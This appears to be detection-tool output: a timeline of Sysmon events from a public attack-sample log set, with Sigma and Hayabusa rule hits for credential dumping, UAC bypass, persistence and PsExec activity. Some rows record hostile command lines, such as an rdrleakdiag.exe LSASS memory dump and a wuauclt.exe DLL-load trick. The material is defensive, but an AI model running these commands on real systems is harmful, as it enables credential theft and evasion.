22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe 
Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 
747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 
00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
